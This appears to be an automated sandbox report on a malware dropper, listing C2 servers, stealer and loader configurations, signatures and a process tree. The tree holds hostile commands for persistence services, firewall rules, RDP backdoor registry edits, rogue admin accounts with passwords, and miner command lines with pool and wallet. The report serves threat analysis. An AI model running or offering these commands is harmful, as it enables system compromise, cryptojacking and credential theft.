Resubmissions

24-01-2022 15:55

220124-tcsn7afch2 10

11-10-2021 17:18

211011-vvdteshga6 10

Analysis

  • max time kernel
    153s
  • max time network
    164s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-10-2021 17:18

General

  • Target

    c10ebeb0d29119a2a7177f857318d012.exe

  • Size

    337KB

  • MD5

    c10ebeb0d29119a2a7177f857318d012

  • SHA1

    687672a6b2001376c192991c1b5237cf6467f393

  • SHA256

    4eb02a90be27af84c49a2f62da8e179e5117d82db4e25c7a2c80e2954583bdb3

  • SHA512

    447e1010864262bc642613b1f597507689d92353930a398bd85a24e2728ea7eb6ad75c413943966a5828422b380de2eff69725c0e5468125e2d9fa35a16df292

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://linavanandr11.club/

http://iselaharty12.club/

http://giovaninardo13.club/

http://zayneliann14.club/

http://zorinosali15.club/

rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

defeatwax.ru

refabyd.info

Extracted

Family

raccoon

Version

1.8.2

Botnet

fbe5e97e7d069407605ee9138022aa82166657e6

Attributes
  • url4cnc

    http://telemirror.top/stevuitreen

    http://tgmirror.top/stevuitreen

    http://telegatt.top/stevuitreen

    http://telegka.top/stevuitreen

    http://telegin.top/stevuitreen

    https://t.me/stevuitreen

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.3

Botnet

1033

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    1033

Extracted

Family

raccoon

Version

1.8.2

Botnet

8d179b9e611eee525425544ee8c6d77360ab7cd9

Attributes
  • url4cnc

    http://teletop.top/agrybirdsgamerept

    http://teleta.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Extracted

Family

raccoon

Version

1.8.2

Botnet

98fe4f3d1d73378234d0a82f16cb8ad29d2d3e75

Attributes
  • url4cnc

    http://telemirror.top/kaba4ello

    http://tgmirror.top/kaba4ello

    http://telegatt.top/kaba4ello

    http://telegka.top/kaba4ello

    http://telegin.top/kaba4ello

    https://t.me/kaba4ello

rc4.plain
rc4.plain

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 4 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • XMRig Miner Payload 5 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 10 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe
    "C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3920
    • C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe
      "C:\Users\Admin\AppData\Local\Temp\c10ebeb0d29119a2a7177f857318d012.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3844
  • C:\Users\Admin\AppData\Local\Temp\C692.exe
    C:\Users\Admin\AppData\Local\Temp\C692.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Users\Admin\AppData\Local\Temp\C692.exe
      C:\Users\Admin\AppData\Local\Temp\C692.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4064
  • C:\Users\Admin\AppData\Local\Temp\CF1E.exe
    C:\Users\Admin\AppData\Local\Temp\CF1E.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1124
  • C:\Users\Admin\AppData\Local\Temp\D960.exe
    C:\Users\Admin\AppData\Local\Temp\D960.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kogigvth\
      2⤵
        PID:820
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\orpkelvf.exe" C:\Windows\SysWOW64\kogigvth\
        2⤵
          PID:3528
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create kogigvth binPath= "C:\Windows\SysWOW64\kogigvth\orpkelvf.exe /d\"C:\Users\Admin\AppData\Local\Temp\D960.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:2652
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description kogigvth "wifi internet conection"
            2⤵
              PID:3956
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start kogigvth
              2⤵
                PID:2360
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3384
              • C:\Users\Admin\AppData\Local\Temp\E17F.exe
                C:\Users\Admin\AppData\Local\Temp\E17F.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:3124
              • C:\Users\Admin\AppData\Local\Temp\EC3E.exe
                C:\Users\Admin\AppData\Local\Temp\EC3E.exe
                1⤵
                • Executes dropped EXE
                PID:3200
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3200 -s 908
                  2⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1856
              • C:\Users\Admin\AppData\Local\Temp\F1FC.exe
                C:\Users\Admin\AppData\Local\Temp\F1FC.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious use of WriteProcessMemory
                PID:1312
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im F1FC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\F1FC.exe" & del C:\ProgramData\*.dll & exit
                  2⤵
                    PID:1332
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im F1FC.exe /f
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3828
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      3⤵
                      • Delays execution with timeout.exe
                      PID:3568
                • C:\Windows\SysWOW64\kogigvth\orpkelvf.exe
                  C:\Windows\SysWOW64\kogigvth\orpkelvf.exe /d"C:\Users\Admin\AppData\Local\Temp\D960.exe"
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:2808
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    PID:2296
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3508
                • C:\Users\Admin\AppData\Local\Temp\631.exe
                  C:\Users\Admin\AppData\Local\Temp\631.exe
                  1⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2068
                • C:\Users\Admin\AppData\Local\Temp\CC9.exe
                  C:\Users\Admin\AppData\Local\Temp\CC9.exe
                  1⤵
                  • Executes dropped EXE
                  PID:2204
                • C:\Users\Admin\AppData\Local\Temp\12A6.exe
                  C:\Users\Admin\AppData\Local\Temp\12A6.exe
                  1⤵
                  • Executes dropped EXE
                  PID:1428
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\12A6.exe"
                    2⤵
                      PID:1016
                      • C:\Windows\System32\cmd.exe
                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                        3⤵
                          PID:3840
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                            4⤵
                            • Creates scheduled task(s)
                            PID:2380
                        • C:\Windows\System32\cmd.exe
                          "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:2608
                          • C:\Users\Admin\AppData\Local\Temp\services32.exe
                            C:\Users\Admin\AppData\Local\Temp\services32.exe
                            4⤵
                            • Executes dropped EXE
                            PID:1816
                            • C:\Windows\System32\conhost.exe
                              "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                              5⤵
                                PID:4752
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5020
                                  • C:\Windows\System32\conhost.exe
                                    "C:\Windows\System32\\conhost.exe" "/sihost32"
                                    7⤵
                                      PID:3148
                        • C:\Users\Admin\AppData\Local\Temp\37F2.exe
                          C:\Users\Admin\AppData\Local\Temp\37F2.exe
                          1⤵
                          • Executes dropped EXE
                          PID:1060
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                            2⤵
                            • Drops file in Windows directory
                            PID:1356
                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgpjjmri\zgpjjmri.cmdline"
                              3⤵
                                PID:2180
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DEB.tmp" "c:\Users\Admin\AppData\Local\Temp\zgpjjmri\CSCA76E5D6A4F244EEE92AA42DAD75841.TMP"
                                  4⤵
                                    PID:2292
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                  3⤵
                                    PID:1652
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                    3⤵
                                      PID:4576
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                      3⤵
                                        PID:5048
                                      • C:\Windows\system32\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                        3⤵
                                          PID:4724
                                        • C:\Windows\system32\reg.exe
                                          "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                          3⤵
                                          • Modifies registry key
                                          PID:3920
                                        • C:\Windows\system32\reg.exe
                                          "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                          3⤵
                                            PID:4660
                                          • C:\Windows\system32\net.exe
                                            "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                            3⤵
                                              PID:4604
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                4⤵
                                                  PID:4988
                                              • C:\Windows\system32\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                3⤵
                                                  PID:5036
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c net start rdpdr
                                                    4⤵
                                                      PID:5056
                                                      • C:\Windows\system32\net.exe
                                                        net start rdpdr
                                                        5⤵
                                                          PID:5108
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 start rdpdr
                                                            6⤵
                                                              PID:2220
                                                      • C:\Windows\system32\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                        3⤵
                                                          PID:2616
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /c net start TermService
                                                            4⤵
                                                              PID:1312
                                                              • C:\Windows\system32\net.exe
                                                                net start TermService
                                                                5⤵
                                                                  PID:2892
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 start TermService
                                                                    6⤵
                                                                      PID:4116
                                                          • C:\Users\Admin\AppData\Local\Temp\4541.exe
                                                            C:\Users\Admin\AppData\Local\Temp\4541.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Loads dropped DLL
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:1092
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1268
                                                              2⤵
                                                              • Program crash
                                                              PID:2760
                                                          • C:\Users\Admin\AppData\Local\Temp\4B1E.exe
                                                            C:\Users\Admin\AppData\Local\Temp\4B1E.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:3760
                                                          • C:\Users\Admin\AppData\Local\Temp\5987.exe
                                                            C:\Users\Admin\AppData\Local\Temp\5987.exe
                                                            1⤵
                                                              PID:2608
                                                              • C:\Windows\System32\conhost.exe
                                                                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\5987.exe"
                                                                2⤵
                                                                  PID:2292
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                    3⤵
                                                                      PID:3968
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        4⤵
                                                                          PID:3840
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                          4⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:3336
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                        3⤵
                                                                          PID:4424
                                                                          • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:4472
                                                                            • C:\Windows\System32\conhost.exe
                                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                              5⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:2592
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:3156
                                                                                • C:\Windows\System32\conhost.exe
                                                                                  "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                  7⤵
                                                                                    PID:1816
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=43m2K5awHfSB4ZtTTJepVVjkWDTnExdqDaHKwv9thKTK9dZAJwzUACebcQnZqMPRLS4keNBn7ZVNdUxtCTCPAx7D43jcvdC --pass= --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                                                                                  6⤵
                                                                                    PID:4100
                                                                        • C:\Users\Admin\AppData\Local\Temp\6B5A.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\6B5A.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:1188
                                                                        • C:\Users\Admin\AppData\Local\Temp\73E7.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\73E7.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:3944
                                                                        • C:\Users\Admin\AppData\Local\Temp\9088.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\9088.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:2272
                                                                        • C:\Users\Admin\AppData\Roaming\fhgcsvr
                                                                          C:\Users\Admin\AppData\Roaming\fhgcsvr
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:368
                                                                          • C:\Users\Admin\AppData\Roaming\fhgcsvr
                                                                            C:\Users\Admin\AppData\Roaming\fhgcsvr
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4244
                                                                        • C:\Windows\System32\cmd.exe
                                                                          cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                          1⤵
                                                                            PID:4976
                                                                            • C:\Windows\system32\net.exe
                                                                              net.exe user WgaUtilAcc Ghasar4f5 /del
                                                                              2⤵
                                                                                PID:4764
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
                                                                                  3⤵
                                                                                    PID:4896
                                                                              • C:\Windows\System32\cmd.exe
                                                                                cmd /C net.exe user WgaUtilAcc FyDeF6dB /add
                                                                                1⤵
                                                                                  PID:4752
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net.exe user WgaUtilAcc FyDeF6dB /add
                                                                                    2⤵
                                                                                      PID:4124
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 user WgaUtilAcc FyDeF6dB /add
                                                                                        3⤵
                                                                                          PID:5100
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                      1⤵
                                                                                        PID:4208
                                                                                        • C:\Windows\system32\net.exe
                                                                                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                          2⤵
                                                                                            PID:5060
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                                                                                              3⤵
                                                                                                PID:4372
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                                                                            1⤵
                                                                                              PID:4552
                                                                                              • C:\Windows\system32\net.exe
                                                                                                net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                                                                                2⤵
                                                                                                  PID:5048
                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                                                                                                    3⤵
                                                                                                      PID:4472

                                                                                                Network

                                                                                                MITRE ATT&CK Enterprise v6

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\ProgramData\freebl3.dll

                                                                                                  MD5

                                                                                                  ef2834ac4ee7d6724f255beaf527e635

                                                                                                  SHA1

                                                                                                  5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                                                                                                  SHA256

                                                                                                  a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                                                                                                  SHA512

                                                                                                  c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                                                                                                • C:\ProgramData\mozglue.dll

                                                                                                  MD5

                                                                                                  8f73c08a9660691143661bf7332c3c27

                                                                                                  SHA1

                                                                                                  37fa65dd737c50fda710fdbde89e51374d0c204a

                                                                                                  SHA256

                                                                                                  3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                                                                                                  SHA512

                                                                                                  0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                                                                                                • C:\ProgramData\msvcp140.dll

                                                                                                  MD5

                                                                                                  109f0f02fd37c84bfc7508d4227d7ed5

                                                                                                  SHA1

                                                                                                  ef7420141bb15ac334d3964082361a460bfdb975

                                                                                                  SHA256

                                                                                                  334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                                                  SHA512

                                                                                                  46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                                                • C:\ProgramData\nss3.dll

                                                                                                  MD5

                                                                                                  bfac4e3c5908856ba17d41edcd455a51

                                                                                                  SHA1

                                                                                                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                                                                                                  SHA256

                                                                                                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                                                                                                  SHA512

                                                                                                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                                                                                                • C:\ProgramData\softokn3.dll

                                                                                                  MD5

                                                                                                  a2ee53de9167bf0d6c019303b7ca84e5

                                                                                                  SHA1

                                                                                                  2a3c737fa1157e8483815e98b666408a18c0db42

                                                                                                  SHA256

                                                                                                  43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                                                                                                  SHA512

                                                                                                  45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                                                                                                • C:\ProgramData\vcruntime140.dll

                                                                                                  MD5

                                                                                                  7587bf9cb4147022cd5681b015183046

                                                                                                  SHA1

                                                                                                  f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                                                                                                  SHA256

                                                                                                  c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                                                                                                  SHA512

                                                                                                  0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                                                                  MD5

                                                                                                  84f2160705ac9a032c002f966498ef74

                                                                                                  SHA1

                                                                                                  e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                                                                                                  SHA256

                                                                                                  7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                                                                                                  SHA512

                                                                                                  f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                  MD5

                                                                                                  2cb3f528286df9feab019e0de2053b6a

                                                                                                  SHA1

                                                                                                  0d5835457f71fd6cdfa45e7280544142e35ad6fc

                                                                                                  SHA256

                                                                                                  bcdaef74a79cde95526e25c52de2623b0e2b2091a304e57db0cd7e640bb08943

                                                                                                  SHA512

                                                                                                  c466148cc9d282d02b5463c2ddd0d28c69a0e1715d4aae3bbf9874d39df6ffbc242f10be9d75b18c71d49626ae4f4bb6886f4955afced091e68590155a79e860

                                                                                                • C:\Users\Admin\AppData\Local\Temp\12A6.exe

                                                                                                  MD5

                                                                                                  ec8d3595617f7182411ad7390b40657f

                                                                                                  SHA1

                                                                                                  9a0293f66c4a5fb71d0c3f4fdb02f6f6dd95bc63

                                                                                                  SHA256

                                                                                                  e7dffe1bcf1d3b696da3930f993d65056c75cd53c5923cbdb2c9c759c3e06f06

                                                                                                  SHA512

                                                                                                  674d641c2a24d53cfdfe70a88f00edb78be185055bb4d34ee3ce5d51ff1a61c9893a79b069e9ba4554fda8ab3e1b3645ce094b496cf7f63b54c8d3b934571075

                                                                                                • C:\Users\Admin\AppData\Local\Temp\12A6.exe

                                                                                                  MD5

                                                                                                  ec8d3595617f7182411ad7390b40657f

                                                                                                  SHA1

                                                                                                  9a0293f66c4a5fb71d0c3f4fdb02f6f6dd95bc63

                                                                                                  SHA256

                                                                                                  e7dffe1bcf1d3b696da3930f993d65056c75cd53c5923cbdb2c9c759c3e06f06

                                                                                                  SHA512

                                                                                                  674d641c2a24d53cfdfe70a88f00edb78be185055bb4d34ee3ce5d51ff1a61c9893a79b069e9ba4554fda8ab3e1b3645ce094b496cf7f63b54c8d3b934571075

                                                                                                • C:\Users\Admin\AppData\Local\Temp\37F2.exe

                                                                                                  MD5

                                                                                                  fc239dd2dc52a4853c7be50c86367f7b

                                                                                                  SHA1

